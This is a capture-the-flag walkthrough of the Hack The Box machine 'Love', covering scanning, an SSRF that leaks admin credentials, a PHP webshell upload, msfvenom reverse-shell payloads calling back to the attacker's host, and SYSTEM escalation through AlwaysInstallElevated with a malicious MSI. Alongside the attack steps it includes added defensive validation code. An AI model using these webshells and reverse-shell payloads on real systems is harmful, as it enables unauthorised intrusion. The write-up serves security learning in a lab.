┌──(kali💀kali)-[~]
└─$ sudo nmap -sC -sV -O 10.10.10.239
80/tcp open http Apache httpd 2.4.46 ((Win64) OpenSSL/1.1.1j PHP/7.3.27)
|_http-server-header: Apache/2.4.46 (Win64) OpenSSL/1.1.1j PHP/7.3.27
|_http-title: Voting System using PHP
| http-cookie-flags:
| /:
| PHPSESSID:
|_ httponly flag not set
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
443/tcp open ssl/http Apache httpd 2.4.46 (OpenSSL/1.1.1j PHP/7.3.27)
| ssl-cert: Subject: commonName=staging.love.htb/organizationName=ValentineCorp/stateOrProvinceName=m/countryName=in
| Not valid before: 2021-01-18T14:00:16
|_Not valid after: 2022-01-18T14:00:16
|_http-title: 403 Forbidden
|_http-server-header: Apache/2.4.46 (Win64) OpenSSL/1.1.1j PHP/7.3.27
|_ssl-date: TLS randomness does not represent time
| tls-alpn:
|_ http/1.1
445/tcp open microsoft-ds Windows 10 Pro 19042 microsoft-ds (workgroup: WORKGROUP)
3306/tcp open mysql?
| fingerprint-strings:
| LPDString, TerminalServer, WMSRequest, giop:
|_ Host '10.10.16.4' is not allowed to connect to this MariaDB server
5000/tcp open http Apache httpd 2.4.46 (OpenSSL/1.1.1j PHP/7.3.27)
|_http-title: 403 Forbidden
|_http-server-header: Apache/2.4.46 (Win64) OpenSSL/1.1.1j PHP/7.3.27
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
SF-Port3306-TCP:V=7.94SVN%I=7%D=1/19%Time=65AB207E%P=x86_64-pc-linux-gnu%r
SF:(LPDString,49,"E\0\0\x01\xffj\x04Host\x20'10\.10\.16\.4'\x20is\x20not\x
SF:20allowed\x20to\x20connect\x20to\x20this\x20MariaDB\x20server")%r(Termi
SF:nalServer,49,"E\0\0\x01\xffj\x04Host\x20'10\.10\.16\.4'\x20is\x20not\x2
SF:0allowed\x20to\x20connect\x20to\x20this\x20MariaDB\x20server")%r(WMSReq
SF:uest,49,"E\0\0\x01\xffj\x04Host\x20'10\.10\.16\.4'\x20is\x20not\x20allo
SF:wed\x20to\x20connect\x20to\x20this\x20MariaDB\x20server")%r(giop,49,"E\
SF:0\0\x01\xffj\x04Host\x20'10\.10\.16\.4'\x20is\x20not\x20allowed\x20to\x
SF:20connect\x20to\x20this\x20MariaDB\x20server");
Device type: general purpose
Running (JUST GUESSING): Microsoft Windows 10|Longhorn|2008|7|2019|11|Vista|XP|8.1 (95%)
OS CPE: cpe:/o:microsoft:windows_10 cpe:/o:microsoft:windows cpe:/o:microsoft:windows_server_2008::sp2 cpe:/o:microsoft:windows_7::sp1 cpe:/o:microsoft:windows_8 cpe:/o:microsoft:windows_vista::sp1 cpe:/o:microsoft:windows_xp::sp3 cpe:/o:microsoft:windows_8.1
Aggressive OS guesses: Microsoft Windows 10 1709 - 1909 (95%), Microsoft Windows Longhorn (94%), Microsoft Windows 10 1703 (93%), Microsoft Windows Server 2008 SP2 (93%), Microsoft Windows 7 SP1 (93%), Microsoft Windows 8 (93%), Microsoft Windows 10 1709 - 1803 (93%), Microsoft Windows 10 1809 - 2004 (93%), Microsoft Windows 10 2004 (93%), Microsoft Windows Server 2019 (93%)
No exact OS matches for host (test conditions non-ideal).
Network Distance: 2 hops
Service Info: Hosts: www.example.com, LOVE, www.love.htb; OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
|_clock-skew: mean: 3h01m34s, deviation: 4h37m10s, median: 21m32s
| smb2-security-mode:
| 3:1:1:
|_ Message signing enabled but not required
| smb-os-discovery:
| OS: Windows 10 Pro 19042 (Windows 10 Pro 6.3)
| OS CPE: cpe:/o:microsoft:windows_10::-
| Computer name: Love
| NetBIOS computer name: LOVE\x00
| Workgroup: WORKGROUP\x00
|_ System time: 2024-01-19T17:45:25-08:00
| smb-security-mode:
| account_used: guest
| authentication_level: user
| challenge_response: supported
|_ message_signing: disabled (dangerous, but default)
| smb2-time:
| date: 2024-01-20T01:45:22
|_ start_date: N/A
┌──(kali💀kali)-[~]
└─$ sudo nmap -sU -O 10.10.10.239
123/udp open|filtered ntp
137/udp open|filtered netbios-ns
138/udp open|filtered netbios-dgm
500/udp open|filtered isakmp
1900/udp open|filtered upnp
4500/udp open|filtered nat-t-ike
5050/udp open|filtered mmcc
5353/udp open|filtered zeroconf
5355/udp open|filtered llmnr
Too many fingerprints match this host to give specific OS details
Network Distance: 2 hops
OS detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 1138.51 seconds
Both by IP and by love.htb, the page returns a login form for a voting system. The page title is “Voting System using PHP”. Some basic password guessing didn’t lead anywhere; no matter what I entered, it returned:
Basic SQL injections didn’t lead anywhere either.
Voting System: http://10.10.10.239/
VIEW SOURCE:
view-source:http://10.10.10.239/
SSL CERT:
WHATWEB:
┌──(kali💀kali)-[~]
└─$ whatweb -a3 https://10.10.10.239/ -v
WhatWeb report for https://10.10.10.239/
Status : 403 Forbidden
Title : 403 Forbidden
IP : 10.10.10.239
Country : RESERVED, ZZ
Summary : Apache[2.4.46], HTTPServer[Apache/2.4.46 (Win64) OpenSSL/1.1.1j PHP/7.3.27], OpenSSL[1.1.1j], PHP[7.3.27]
Detected Plugins:
[ Apache ]
The Apache HTTP Server Project is an effort to develop and
maintain an open-source HTTP server for modern operating
systems including UNIX and Windows NT. The goal of this
project is to provide a secure, efficient and extensible
server that provides HTTP services in sync with the current
HTTP standards.
Version : 2.4.46 (from HTTP Server Header)
Google Dorks: (3)
Website : http://httpd.apache.org/
[ HTTPServer ]
HTTP server header string. This plugin also attempts to
identify the operating system from the server header.
String : Apache/2.4.46 (Win64) OpenSSL/1.1.1j PHP/7.3.27 (from server string)
[ OpenSSL ]
The OpenSSL Project is a collaborative effort to develop a
robust, commercial-grade, full-featured, and Open Source
toolkit implementing the Secure Sockets Layer (SSL v2/v3)
and Transport Layer Security (TLS v1) protocols as well as
a full-strength general purpose cryptography library.
Version : 1.1.1j
Website : http://www.openssl.org/
[ PHP ]
PHP is a widely-used general-purpose scripting language
that is especially suited for Web development and can be
embedded into HTML. This plugin identifies PHP errors,
modules and versions and extracts the local file path and
username if present.
Version : 7.3.27
Google Dorks: (2)
Website : http://www.php.net/
HTTP Headers:
HTTP/1.1 403 Forbidden
Date: Sat, 20 Jan 2024 02:33:46 GMT
Server: Apache/2.4.46 (Win64) OpenSSL/1.1.1j PHP/7.3.27
Content-Length: 303
Connection: close
Content-Type: text/html; charset=iso-8859-1
Directory brute-forcing returned a bunch of 403 Forbiddens and 301/302 redirects. I am most interested in /admin. Visiting it presents another login form:
NIKTO:
┌──(kali💀kali)-[~]
└─$ nikto -h http://10.10.10.239
+ Server: Apache/2.4.46 (Win64) OpenSSL/1.1.1j PHP/7.3.27
+ /: Cookie PHPSESSID created without the httponly flag. See: https://developer.mozilla.org/en-US/docs/Web/HTTP/Cookies
+ /: Retrieved x-powered-by header: PHP/7.3.27.
+ /: The anti-clickjacking X-Frame-Options header is not present. See: https://developer.mozilla.org/en-US/docs/Web/HTTP/Headers/X-Frame-Options
+ /: The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type. See: https://www.netsparker.com/web-vulnerability-scanner/vulnerabilities/missing-content-type-header/
+ Apache/2.4.46 appears to be outdated (current is at least Apache/2.4.54). Apache 2.2.34 is the EOL for the 2.x branch.
+ OpenSSL/1.1.1j appears to be outdated (current is at least 3.0.7). OpenSSL 1.1.1s is current for the 1.x branch and will be supported until Nov 11 2023.
+ PHP/7.3.27 appears to be outdated (current is at least 8.1.5), PHP 7.4.28 for the 7.4 branch.
+ /: Web Server returns a valid response with junk HTTP methods which may cause false positives.
+ /: HTTP TRACE method is active which suggests the host is vulnerable to XST. See: https://owasp.org/www-community/attacks/Cross_Site_Tracing
+ /admin/: This might be interesting.
+ /includes/: Directory indexing found.
+ /includes/: This might be interesting.
+ /admin/index.php: This might be interesting: has been seen in web logs from an unknown scanner.
+ /icons/: Directory indexing found.
+ /images/: Directory indexing found.
+ /icons/README: Apache default file found. See: https://www.vntweb.co.uk/apache-restricting-access-to-iconsreadme/
+ /Admin/: This might be interesting.
With manual attempts exhausted, I’ll run sqlmap with -r request to give it the captured login POST to work from, --force-ssl, and --batch to accept the defaults at the prompts. It finds nothing injectable, and the 219 HTTP 403s are the tell: the HTTPS virtual host answers with 403 Forbidden (nmap and whatweb both showed that), so most if not all of these probes were answered by the forbidden page rather than by the login form on port 80:
┌──(kali💀kali)-[~/Desktop]
└─$ sqlmap -r request --force-ssl --batch
[21:34:18] [WARNING] POST parameter 'login' does not seem to be injectable
[21:34:18] [CRITICAL] all tested parameters do not appear to be injectable. Try to increase values for '--level'/'--risk' options if you wish to perform more tests. If you suspect that there is some kind of protection mechanism involved (e.g. WAF) maybe you could try to use option '--tamper' (e.g. '--tamper=space2comment') and/or switch '--random-agent'
[21:34:18] [WARNING] HTTP error codes detected during run:
403 (Forbidden) - 219 times
Adding --dbs to the end of the command and running it again changes nothing: same verdict, same wall of 403s:
┌──(kali💀kali)-[~/Desktop]
└─$ sqlmap -r request --force-ssl --batch --dbs
[21:39:08] [WARNING] POST parameter 'login' does not seem to be injectable
[21:39:08] [CRITICAL] all tested parameters do not appear to be injectable. Try to increase values for '--level'/'--risk' options if you wish to perform more tests. If you suspect that there is some kind of protection mechanism involved (e.g. WAF) maybe you could try to use option '--tamper' (e.g. '--tamper=space2comment') and/or switch '--random-agent'
[21:39:08] [WARNING] HTTP error codes detected during run:
403 (Forbidden) - 218 times
The follow-on commands, listing the tables in a database and dumping its users table, only make sense once an injection exists; here they have nothing to work with (and -D public is a PostgreSQL schema name, whereas this host runs MariaDB, so the database name would first have to come from --dbs):
sqlmap -r request --force-ssl --batch -D public --tables
sqlmap -r request --force-ssl --batch -D public -T users --dump
Nothing here identified a backend OS either: nmap already showed Windows 10 Pro 19042 with MariaDB on 3306 refusing my IP, and the shell I get later lands in C:\xampp\htdocs, so there is no container in play. The login form is a dead end. The HTTPS certificate’s commonName, staging.love.htb, is a virtual host name worth adding to /etc/hosts and visiting next.
SSRF
Getting the server to make a request on my behalf, and so reach something I can’t reach directly, is a server-side request forgery (SSRF). Usually the hook is better disguised than a site that openly asks for a URL, but using it to access things I shouldn’t have access to is SSRF all the same.
I tried entering https://127.0.0.1, but nothing came back. Port 5000 returned 403 Forbidden from the outside, so I checked it through the loopback interface instead by entering http://127.0.0.1:5000:
Vote Admin Creds admin: @LoveIsInTheAir!!!!
It seems to be giving creds for the Voting System, and they work.
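The bug here is that the server fetched whatever URL it was handed, including loopback. The check below is an added example of the validation such a fetcher needs; it is not code from this site or from the original write-up, and it stands in for DNS with a constructed lookup table (a real deployment would use socket.getaddrinfo and then connect to the resolved address, not the hostname, so the answer can’t change between check and fetch). It goes beyond the page’s single case and also rejects the decimal-IP and embedded-credential tricks that commonly slip past naive blocklists.

```python
import ipaddress
from urllib.parse import urlsplit

# Constructed resolver table standing in for DNS (assumption: not real lookups).
# "localhost" and the decimal form 2130706433 both map to the loopback address.
FAKE_DNS = {
    "localhost": ["127.0.0.1"],
    "2130706433": ["127.0.0.1"],         # decimal IPv4, a classic filter bypass
    "staging.love.htb": ["10.10.10.239"],
    "example.com": ["93.184.216.34"],
}

ALLOWED_SCHEMES = {"http", "https"}
ALLOWED_PORTS = {80, 443}              # port 5000 is exactly what must stay unreachable


def resolve(host):
    """Every address a host resolves to; literal IPs resolve to themselves."""
    try:
        return [str(ipaddress.ip_address(host))]
    except ValueError:
        return FAKE_DNS.get(host.lower(), [])


def is_safe_target(url):
    """Allow only http(s) on 80/443 to hosts whose every address is globally routable."""
    parts = urlsplit(url)
    if parts.scheme not in ALLOWED_SCHEMES or not parts.hostname:
        return False
    if parts.username or parts.password:          # http://trusted@127.0.0.1 style tricks
        return False
    try:
        port = parts.port or (443 if parts.scheme == "https" else 80)
    except ValueError:                             # non-numeric or out-of-range port
        return False
    if port not in ALLOWED_PORTS:
        return False
    addrs = resolve(parts.hostname)
    if not addrs:                                  # unresolvable: fail closed
        return False
    for addr in addrs:
        ip = ipaddress.ip_address(addr)
        # Reject loopback, RFC1918, link-local (cloud metadata lives there), multicast,
        # reserved and unspecified addresses; is_global is the positive check.
        if (ip.is_loopback or ip.is_private or ip.is_link_local or ip.is_multicast
                or ip.is_reserved or ip.is_unspecified or not ip.is_global):
            return False
    return True
```

Note that on this lab network the target itself is RFC1918, so the check rejects staging.love.htb too; that is the intended behaviour of the defence, not a bug in it.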
RCE via Searchsploit Script
Having identified an authenticated RCE exploit for Voting System earlier in searchsploit, and now having creds, I’ll give that a try. searchsploit -m php/webapps/49445.py copies it to my current working directory. It’s a Python script. At the top there’s some config info to update:
┌──(kali💀kali)-[~/Desktop]
└─$ searchsploit -m php/webapps/49445.py
Exploit: Voting System 1.0 - File Upload RCE (Authenticated Remote Code Execution)
URL: https://www.exploit-db.com/exploits/49445
Path: /usr/share/exploitdb/exploits/php/webapps/49445.py
Codes: N/A
Verified: False
File Type: Python script, ASCII text executable, with very long lines (6002)
Copied to: /home/kali/Desktop/49445.py
# --- Edit your settings here ----
IP = "10.10.10.239" # Website's URL
USERNAME = "admin" #Auth username
PASSWORD = "@LoveIsInTheAir!!!!" # Auth Password
REV_IP = "10.10.16.4" # Reverse shell IP
REV_PORT = "8888" # Reverse port
# --------------------------------
Troubleshooting:
I ran the exploit, and nothing happened. Looking at the Python script, it uses requests to send HTTP requests to the website. At the start, it creates a session, which holds things like cookies so that the login persists across requests, and stores it in the global variable s. I’ll add Burp as a proxy on that session so I can see the requests it is sending and spot what’s wrong.
On running the script again, I see three requests, all returning 404: it isn’t finding any of those pages. Above, I found the admin login page at /admin/login.php, but this script is prefixing /votingsystem to that path. Right under the settings block there’s a handful of URLs defined; I’ll remove /votingsystem from each and save the script.
RCE Manually
Once logged in, there’s not a ton to see; clicking around the panels didn’t lead to anything interesting. However, clicking on the logged-in user’s name, Neovic Devierte, there’s an option to update. Clicking that brings up a form to update the admin profile:
The profile picture is the first target that comes to mind, as it’s a chance to upload something. It looks like no filtering is in place at all: if I select a simple PHP webshell and upload it as cmd.php, it doesn’t complain.
<?php system($_REQUEST["cmd"]); ?>
The image at the top of the page is now broken. Looking at the page source, it saved the file under /images/ as cmd.php. Visiting http://love.htb/images/cmd.php with no parameter returns PHP errors about the missing cmd:
Notice: Undefined index: cmd in C:\xampp\htdocs\omrs\images\shell.php on line 1
Warning: system(): Cannot execute a blank command in C:\xampp\htdocs\omrs\images\shell.php on line 1
Those notices are a finding in their own right: display_errors is on, and the messages leak the absolute webroot, C:\xampp\htdocs\omrs\.
Adding ?cmd=whoami to the end shows I have execution:
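The upload handler accepted a .php file as a profile picture and stored it under its original name inside the webroot. The function below is an added example of the checks it was missing, written here as language-neutral validation logic rather than taken from the application or the original write-up: an extension allowlist, a magic-byte check that the content matches the claimed type, a size cap, and a server-chosen random filename so the client never controls what ends up on disk. The sample image bytes are constructed headers, not real images.

```python
import secrets
from os.path import splitext

# Extension allowlist with the file signature each one must start with.
# A blocklist (".php", ".phtml", ...) is the wrong shape: it is always incomplete.
ALLOWED = {
    ".png": b"\x89PNG\r\n\x1a\n",
    ".jpg": b"\xff\xd8\xff",
    ".jpeg": b"\xff\xd8\xff",
    ".gif": b"GIF8",
}
MAX_BYTES = 2 * 1024 * 1024


def validate_upload(filename, data, max_bytes=MAX_BYTES):
    """Return a safe name to store the file under, or None to reject the upload.

    The returned name is random and carries only the allowlisted extension; the
    client-supplied name is used solely to read the claimed type, never on disk.
    """
    if "\x00" in filename or not filename.isprintable():   # null-byte truncation tricks
        return None
    ext = splitext(filename)[1].lower()                     # "shell.php.png" -> ".png"
    if ext not in ALLOWED:
        return None
    if not (0 < len(data) <= max_bytes):
        return None
    if not data.startswith(ALLOWED[ext]):                   # content must match the type
        return None
    if b"<?php" in data:                                    # defence in depth vs. GIF89a/PHP polyglots
        return None
    return secrets.token_hex(16) + ext
```

Even with this check, uploads should live outside the document root or in a directory where the web server has script execution disabled; validation limits what gets stored, the serving configuration limits what a stored file can do.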
┌──(kali💀kali)-[~/Desktop]
└─$ msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.10.16.4 LPORT=2560 -f exe > shell.exe
[-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload
[-] No arch selected, selecting arch: x86 from the payload
No encoder specified, outputting raw payload
Payload size: 354 bytes
Final size of exe file: 73802 bytes
I started exploit/multi/handler to catch the callback:
┌──(kali💀kali)-[~]
└─$ msfconsole
msf6 > use exploit/multi/handler
msf6 exploit(multi/handler) > set payload windows/meterpreter/reverse_tcp
msf6 exploit(multi/handler) > set LHOST tun0
msf6 exploit(multi/handler) > exploit
[*] Started reverse TCP handler on 10.10.16.4:4444
[*] Sending stage (175686 bytes) to 10.10.10.239
[*] Meterpreter session 1 opened (10.10.16.4:4444 -> 10.10.10.239:52801) at 2024-01-20 08:02:10 -0500
meterpreter > whoami
[-] Unknown command: whoami
meterpreter > shell
Process 552 created.
Channel 1 created.
Microsoft Windows [Version 10.0.19042.867]
(c) 2020 Microsoft Corporation. All rights reserved.
C:\xampp\htdocs\omrs\images>whoami
love\phoebe
C:\xampp\htdocs\omrs\images>cd C:\Users\Phoebe\Desktop
C:\Users\Phoebe\Desktop>type user.txt
type user.txt
11fe5539e57b18f---------------------
Shell as SYSTEM
Enumeration
After looking around the filesystem a bit manually, I opted to run winPEAS. After cloning the repo to my VM, I went into the directory with winPEAS.exe and started a Python web server (python3 -m http.server 80).
There’s a hit on the webserver, and the file is present on the box as wp.exe in C:\ProgramData. Now I’ll run it with .\wp.exe. There’s a ton of output, so I’ll just highlight the interesting parts.
C:\ProgramData>dir
Directory of C:\ProgramData
07/10/2015 03:04 AM <DIR> Comms
11/18/2020 11:45 PM <DIR> Microsoft OneDrive
04/21/2021 06:58 AM <DIR> Package Cache
04/13/2021 07:40 AM <DIR> Packages
01/19/2024 05:42 PM <DIR> regid.1991-06.com.microsoft
12/07/2019 01:14 AM <DIR> SoftwareDistribution
11/18/2020 06:54 PM <DIR> ssh
04/12/2021 12:14 PM <DIR> USOPrivate
12/07/2019 01:14 AM <DIR> USOShared
04/21/2021 09:02 AM <DIR> VMware
12/07/2019 01:52 AM <DIR> WindowsHolographicDevices
01/20/2024 06:46 AM 2,234,880 wp.exe
[+] Drives Information
[?] Remember that you should search more info inside the other drives
C:\ (Type: Fixed)(Filesystem: NTFS)(Available space: 3 GB)(Permissions: Authenticated Users [AppendData/CreateDirectories])
Being able to create directories at the C:\ root is interesting.
Display information about local users
Computer Name : LOVE
User Name : Administrator
User Id : 500
Is Enabled : True
User Type : Administrator
Comment : Built-in account for administering the computer/domain
Last Logon : 1/20/2024 6:47:33 AM
Logons Count : 737
Password Last Set : 4/12/2021 12:24:41 PM
=================================================================================================
Computer Name : LOVE
User Name : DefaultAccount
User Id : 503
Is Enabled : False
User Type : Guest
Comment : A user account managed by the system.
Last Logon : 1/1/1970 12:00:00 AM
Logons Count : 0
Password Last Set : 1/1/1970 12:00:00 AM
=================================================================================================
Computer Name : LOVE
User Name : Guest
User Id : 501
Is Enabled : False
User Type : Guest
Comment : Built-in account for guest access to the computer/domain
Last Logon : 1/1/1970 12:00:00 AM
Logons Count : 0
Password Last Set : 1/1/1970 12:00:00 AM
=================================================================================================
Computer Name : LOVE
User Name : Phoebe
User Id : 1002
Is Enabled : True
User Type : User
Comment : Workstation Power User
Last Logon : 1/19/2024 5:42:44 PM
Logons Count : 23
Password Last Set : 4/12/2021 11:54:30 AM
=================================================================================================
Computer Name : LOVE
User Name : WDAGUtilityAccount
User Id : 504
Is Enabled : False
User Type : Guest
Comment : A user account managed and used by the system for Windows Defender Application Guard scenarios.
Last Logon : 1/1/1970 12:00:00 AM
Logons Count : 0
Password Last Set : 4/12/2021 12:10:32 PM
AlwaysInstallElevated:
The next winPEAS hit is AlwaysInstallElevated. When this REG_DWORD is set to 1 under both HKLM\SOFTWARE\Policies\Microsoft\Windows\Installer and HKCU\SOFTWARE\Policies\Microsoft\Windows\Installer, Windows Installer runs any .msi a user installs as NT AUTHORITY\SYSTEM, whatever that user’s own privileges. Both keys must be set; one alone does nothing. So all I need to do is create a malicious .msi file and run it.
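The condition is easy to get wrong by hand, since a 1 in only one hive looks promising but is not exploitable. The snippet below is an added example, not part of the original write-up or of winPEAS, that parses the output of reg query for both keys and only reports the misconfiguration when both values are 1. The two sample outputs are constructed in reg.exe’s format, not captured from this box; query_live runs reg.exe and is only meaningful on a Windows target.

```python
import re
import subprocess

KEYS = [
    r"HKLM\SOFTWARE\Policies\Microsoft\Windows\Installer",
    r"HKCU\SOFTWARE\Policies\Microsoft\Windows\Installer",
]
VALUE = "AlwaysInstallElevated"

# Matches reg.exe value lines such as "    AlwaysInstallElevated    REG_DWORD    0x1"
_DWORD_LINE = re.compile(r"^\s*(\S+)\s+REG_DWORD\s+0x([0-9a-fA-F]+)\s*$", re.M)


def parse_reg_query(output):
    """Extract REG_DWORD values from reg query output as {name: int}."""
    return {m.group(1): int(m.group(2), 16) for m in _DWORD_LINE.finditer(output)}


def always_install_elevated(hklm_output, hkcu_output):
    """True only when BOTH hives set AlwaysInstallElevated to 1; a missing key counts as 0."""
    return all(parse_reg_query(out).get(VALUE, 0) == 1 for out in (hklm_output, hkcu_output))


def query_live():
    """Run reg.exe for both keys on a Windows host and return the two raw outputs."""
    outputs = []
    for key in KEYS:
        proc = subprocess.run(["reg", "query", key, "/v", VALUE],
                              capture_output=True, text=True)
        outputs.append(proc.stdout)   # a missing key gives empty stdout and an error on stderr
    return tuple(outputs)


# Constructed sample outputs (assumption: shaped like reg.exe, not captured from the box).
SAMPLE_HKLM = """
HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows\\Installer
    AlwaysInstallElevated    REG_DWORD    0x1
"""
SAMPLE_HKCU = """
HKEY_CURRENT_USER\\SOFTWARE\\Policies\\Microsoft\\Windows\\Installer
    AlwaysInstallElevated    REG_DWORD    0x1
"""

if __name__ == "__main__":
    print("AlwaysInstallElevated exploitable:", always_install_elevated(*query_live()))
```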
I’ll use msfvenom to create the MSI installer. I did show this process manually for Ethereal, but it’s a painful process, and msfvenom will work here. I’ll use a reverse shell payload that I can catch with nc:
┌──(kali💀kali)-[~/Desktop]
└─$ msfvenom -p windows/x64/shell_reverse_tcp LHOST=10.10.16.4 LPORT=443 -f msi -o rev.msi
[-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload
No encoder specified, outputting raw payload
Payload size: 460 bytes
Final size of msi file: 159744 bytes
Saved as: rev.msi
I fetch rev.msi from my Python webserver (now serving my love directory) into C:\ProgramData and run it:
C:\ProgramData>.\rev.msi
This returns nothing, but there’s a shell at my listening nc:
┌──(kali💀kali)-[~]
└─$ rlwrap nc -lnvp 443
connect to [10.10.16.4] from (UNKNOWN) [10.10.10.239] 52812
Microsoft Windows [Version 10.0.19042.867]
(c) 2020 Microsoft Corporation. All rights reserved.
C:\WINDOWS\system32>whoami
nt authority\system
C:\WINDOWS\system32> cd C:\Users\Administrator\Desktop
C:\Users\Administrator\Desktop> dir
Directory of C:\Users\Administrator\Desktop
04/13/2021 02:20 AM <DIR> .
04/13/2021 02:20 AM <DIR> ..
01/19/2024 05:43 PM 34 root.txt
C:\Users\Administrator\Desktop> type root.txt
6369eb24d114e591---------------------